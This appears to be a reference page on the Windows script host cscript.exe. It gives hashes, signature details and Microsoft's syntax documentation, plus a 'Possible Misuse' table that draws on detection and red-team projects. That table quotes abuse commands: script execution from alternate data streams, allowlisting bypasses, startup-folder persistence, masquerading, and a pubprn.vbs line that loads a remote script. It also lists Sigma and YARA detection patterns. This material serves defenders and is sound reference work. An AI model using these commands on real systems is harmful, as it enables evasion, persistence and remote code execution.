cscript.exe

  • File Path: C:\Windows\SysWOW64\cscript.exe
  • Description: Microsoft Console Based Script Host

Hashes

Type Hash
MD5 79E4FBFE24A81B3A2AEB3B3D3DEB3D75
SHA1 9C7C87842FED7649412B035DF3712B605E40DBED
SHA256 BBD44AC1C7DFD0102EBA486AA1552742A11C4A94283133ED0C4AAC92FAD6A4D9
SHA384 C77391A6EB09C7632F996F0CCF693C2B2903D0AC1A35F908DFD4E15066C6D23C822F2F64FB6F74DEBD07592E920DB575
SHA512 FD967765BD6E671740FC053C1795A355F9E3B8D47A6B6DF4B3B7CED66A5E84C54038EE3F3231FE6D91ECE2D833F564F4515744E4CFF7369256526B58FC0AFBC4
SSDEEP 3072:ogRukzrvPutB4woyKzs3mYnfEG6NNUSstgNUt9qyyqTxt/I:vvng93mY8sKEqylTk
IMP E4D90F9825B64532B46F2C87EC5B0A16
PESHA1 995511CDD28C6469BB3326310286192DDEC5B5B2
PE256 B3EA6658D04C8C1653CBF3D35AD316D097229F923DFAC1C27E73604A0ADAD788

Runtime Data

Usage (stdout):

Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

Usage: CScript scriptname.extension [option...] [arguments...]

Options:
 //B         Batch mode: Suppresses script errors and prompts from displaying
 //D         Enable Active Debugging
 //E:engine  Use engine for executing script
 //H:CScript Changes the default script host to CScript.exe
 //H:WScript Changes the default script host to WScript.exe (default)
 //I         Interactive mode (default, opposite of //B)
 //Job:xxxx  Execute a WSF job
 //Logo      Display logo (default)
 //Nologo    Prevent logo display: No banner will be shown at execution time
 //S         Save current command line options for this user
 //T:nn      Time out in seconds:  Maximum time a script is permitted to run
 //X         Execute script in debugger
 //U         Use Unicode for redirected I/O from the console

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\cscript.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: cscript.exe
  • Product Name: Microsoft Windows Script Host
  • Company Name: Microsoft Corporation
  • File Version: 5.812.10240.16384
  • Product Version: 5.812.10240.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/70
  • VirusTotal Link: https://www.virustotal.com/gui/file/bbd44ac1c7dfd0102eba486aa1552742a11c4a94283133ed0c4aac92fad6a4d9/detection/

Possible Misuse

The following table contains possible examples of cscript.exe being misused. While cscript.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\cscript.exe' DRL 1.0
sigma godmode_sigma_rule.yml - 'cscript' DRL 1.0
sigma sysmon_cactustorch.yml - '\System32\cscript.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'cscript' DRL 1.0
sigma file_event_win_winrm_awl_bypass.yml description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml title: WScript or CScript Dropper DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml - '\cscript.exe' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\cscript.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\cscript.exe' DRL 1.0
sigma image_load_susp_script_dotnet_clr_dll_load.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_apt_cloudhopper.yml description: Detects suspicious file execution by wscript and cscript DRL 1.0
sigma proc_creation_win_apt_cloudhopper.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_lolbin_cscript_gathernetworkinfo.yml description: Adversaries can abuse of C:\Windows\System32\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target DRL 1.0
sigma proc_creation_win_lolbin_cscript_gathernetworkinfo.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml title: WScript or CScript Dropper DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml description: Detects wscript/cscript executions of scripts located in user directories DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_mal_adwind.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_manage_bde_lolbas.yml - 'cscript' DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_multiple_suspicious_cli.yml - cscript.exe DRL 1.0
sigma proc_creation_win_office_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_public_folder_parent.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_csc.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_cscript_vbs.yml title: Cscript Visual Basic Script Execution DRL 1.0
sigma proc_creation_win_susp_cscript_vbs.yml Image\|endswith: \cscript.exe DRL 1.0
sigma proc_creation_win_susp_powershell_parent_combo.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml title: Suspicious Registration via cscript.exe DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml - https://ss64.com/vb/cscript.html DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_execution.yml description: Detects suspicious file execution by wscript and cscript DRL 1.0
sigma proc_creation_win_susp_script_execution.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_winrm_awl_bypass.yml description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) DRL 1.0
sigma proc_creation_win_susp_winrm_execution.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\cscript.exe' DRL 1.0
sigma registry_event_susp_run_key_img_folder.yml - 'cscript' DRL 1.0
LOLBAS Testxlst.yml - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out  
LOLBAS Cscript.yml Name: Cscript.exe  
LOLBAS Cscript.yml - Command: cscript c:\ads\file.txt:script.vbs  
LOLBAS Cscript.yml Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).  
LOLBAS Cscript.yml - Path: C:\Windows\System32\cscript.exe  
LOLBAS Cscript.yml - Path: C:\Windows\SysWOW64\cscript.exe  
LOLBAS Cscript.yml - IOC: Cscript.exe executing files from alternate data streams  
LOLBAS Cscript.yml - IOC: DotNet CLR libraries loaded into cscript.exe  
LOLBAS Cscript.yml - IOC: DotNet CLR Usage Log - cscript.exe.log  
LOLBAS Manage-bde.yml - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf  
LOLBAS Manage-bde.yml - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf  
LOLBAS Winrm.yml - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'  
LOLBAS Winrm.yml Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location  
atomic-red-team index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md cscript #{vbscript} > $env:TEMP\T1059.005.out.txt MIT License. © 2018 Red Canary
atomic-red-team T1082.md cscript #{vbscript} MIT License. © 2018 Red Canary
atomic-red-team T1105.md CScript.exe AtomicTestT1105.js //E:JScript MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md $macrocode = “ Open "#{jse_path}” For Output As #1n Write #1, “WScript.Quit"n Close #1n Shell$ "cscript.exe #{jse_path}“`n” MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Uses cscript //E:jscript to download a file MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md cscript //E:Jscript #{script_file} MIT License. © 2018 Red Canary
atomic-red-team T1216.md cscript %windir%\System32\manage-bde.wsf MIT License. © 2018 Red Canary
atomic-red-team T1216.001.md PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1216.001.md cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost “script:#{remote_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe /E:Jscript “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe /E:Jscript “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse” MIT License. © 2018 Red Canary
signature-base apt_monsoon.yar $x3 = “ cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d” fullword wide CC BY-NC 4.0
signature-base apt_oilrig.yar $x2 = “cscript.exe //T:20 //Nologo “ fullword ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $a1 = “taskkill /F /IM cscript.exe” fullword ascii CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s1 = “/c "C:\windows\temp\cscript" C:\windows\temp\iis.vbs” fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_wannacry.yar $s2 = “cscript.exe //nologo m.vbs” fullword ascii CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


cscript

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Starts a script to run in a command-line environment.

[!IMPORTANT] Performing this task does not require you to have administrative credentials. Therefore, as a security best practice, consider performing this task as a user without administrative credentials.

Syntax

cscript <scriptname.extension> [/b] [/d] [/e:<engine>] [{/h:cscript | /h:wscript}] [/i] [/job:<identifier>] [{/logo | /nologo}] [/s] [/t:<seconds>] [x] [/u] [/?] [<scriptarguments>]
Parameters
Parameter Description
scriptname.extension Specifies the path and file name of the script file with optional file name extension.
/b Specifies batch mode, which does not display alerts, scripting errors, or input prompts.
/d Starts the debugger.
/e:<engine> Specifies the engine that is used to run the script.
/h:cscript Registers cscript.exe as the default script host for running scripts.
/h:wscript Registers wscript.exe as the default script host for running scripts. The default.
/i Specifies interactive mode, which displays alerts, scripting errors, and input prompts. The default, and the opposite of /b.
/job:<identifier> Runs the job identified by identifier in a .wsf script file.
/logo Specifies that the Windows Script Host banner is displayed in the console before the script runs. The default, and the opposite of /nologo.
/nologo Specifies that the Windows Script Host banner is not displayed before the script runs.
/s Saves the current command-prompt options for the current user.
/t:<seconds> Specifies the maximum time the script can run (in seconds). You can specify up to 32,767 seconds. The default is no time limit.
/u Specifies Unicode for input and output that is redirected from the console.
/x Starts the script in the debugger.
/? Displays available command parameters and provides help for using them. The same as typing cscript.exe with no parameters and no script.
scriptarguments Specifies the arguments passed to the script. Each script argument must be preceded by a slash (/).
Remarks
  • Each parameter is optional; however, you can’t specify script arguments without specifying a script. If you don’t specify a script or any script arguments, cscript.exe displays the cscript.exe syntax and the valid host options.

  • The /t parameter prevents excessive running of scripts by setting a timer. When the run time exceeds the specified value, cscript interrupts the script engine and ends the process.

  • Windows script files usually have one of the following file name extensions: .wsf, .vbs, .js. Windows Script Host can use .wsf script files. Each .wsf file can use multiple scripting engines and perform multiple jobs.

  • if you double-click a script file with an extension that has no association, the Open With dialog box appears. Select wscript or cscript, and then select Always use this program to open this file type. This registers wscript.exe or cscript as the default script host for files of this file type.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.